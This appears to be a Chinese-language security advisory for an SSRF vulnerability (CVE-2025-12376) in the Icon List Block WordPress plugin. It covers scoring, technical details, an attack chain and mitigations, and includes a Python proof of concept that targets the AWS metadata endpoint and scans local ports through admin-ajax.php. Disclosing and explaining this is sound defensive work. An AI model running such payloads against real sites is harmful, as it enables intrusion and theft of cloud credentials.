CVE-2025-12376: WordPress Icon List Block插件服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-12376

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Icon List Block – Add Icon-Based Lists with Custom Styles (WordPress插件)

漏洞概述

CVE-2025-12376是WordPress插件Icon List Block中的一个服务器端请求伪造(SSRF)安全漏洞。该插件专门用于在WordPress网站中添加基于图标的列表和自定义样式功能。漏洞存在于插件的fs_api_request函数中，影响所有版本直至1.2.1。攻击者利用此漏洞可以绕过服务器安全限制，以受害服务器的IP地址向任意内部或外部资源发起HTTP请求。由于CVSS评分达到6.4(中危级别)，且攻击复杂度低、权限要求仅为订阅者级别，这使得该漏洞具有较高的实际利用风险。攻击者主要利用此漏洞探测内网服务、访问云服务元数据、读取本地文件内容或进行端口扫描等恶意活动。插件仅返回有效的JSON对象响应，这在一定程度上限制了直接的数据泄露，但仍然为攻击者提供了有价值的信息收集渠道。

技术细节

漏洞根源在于Icon List Block插件的fs_api_request函数缺乏对用户输入URL的充分验证和过滤。攻击者通过构造恶意的URL参数，诱使服务器向指定目标发起请求。攻击流程如下：首先，攻击者需要拥有一个有效的WordPress账户(至少订阅者级别权限)；然后，通过WordPress的REST API或AJAX端点向fs_api_request函数提交包含恶意URL的请求；服务器执行请求并将结果以JSON格式返回。关键风险点包括：(1)URL验证缺失：函数未验证用户提供的URL是否属于合法域名；(2)协议限制不足：可能允许file://、dict://等非HTTP协议；(3)内部网络访问：可访问VPC内网、云元数据端点等内部资源；(4)响应可控：虽然仅返回JSON，但可用于探测服务存活状态或获取部分响应内容。攻击者常利用此漏洞访问云服务元数据接口(如AWS 169.254.169.254)、内网数据库连接信息或进行横向移动侦察。

攻击链分析

STEP 1

步骤1

攻击者注册并获取WordPress账户(订阅者级别权限)

STEP 2

步骤2

识别目标网站是否安装并启用Icon List Block插件(版本≤1.2.1)

STEP 3

步骤3

通过wp-admin/admin-ajax.php端点发送包含恶意URL的fs_api_request请求

STEP 4

步骤4

服务器执行请求，将响应以JSON格式返回给攻击者

STEP 5

步骤5

攻击者利用返回信息进行内网探测、云元数据获取或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12376 PoC - WordPress Icon List Block SSRF
# Authenticated Subscriber+ required

import requests
import json

target_url = "http://target-wordpress-site.com"
wp_user = "attacker"
wp_pass = "password123"

# Login to WordPress to get authentication cookies
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": wp_user,
    "pwd": wp_pass,
    "wp-submit": "Log In"
}

# Get nonce for AJAX request
session.post(login_url, data=login_data)

# PoC 1: Access AWS metadata service
ssrf_payload = {
    "action": "fs_api_request",
    "url": "http://169.254.169.254/latest/meta-data/"
}

# Alternative PoC: Internal port scanning
ssrf_payload_portscan = {
    "action": "fs_api_request",
    "url": "http://localhost:3306/"
}

# Send malicious request
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
response = session.post(ajax_url, data=ssrf_payload)

print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

# Note: Only valid JSON responses are rendered

影响范围

Icon List Block插件 ≤ 1.2.1

防御指南

临时缓解措施

由于该漏洞需要认证才能利用，建议在升级插件前临时措施包括：(1)限制新用户注册功能，仅允许受信任用户创建账户；(2)审查现有订阅者级别用户，移除可疑账户；(3)使用WordPress权限控制插件将订阅者角色权限降至最低；(4)在Web服务器层面配置IP黑名单，阻止已知攻击源IP。最佳方案仍是尽快升级到插件最新版本以彻底修复此SSRF漏洞。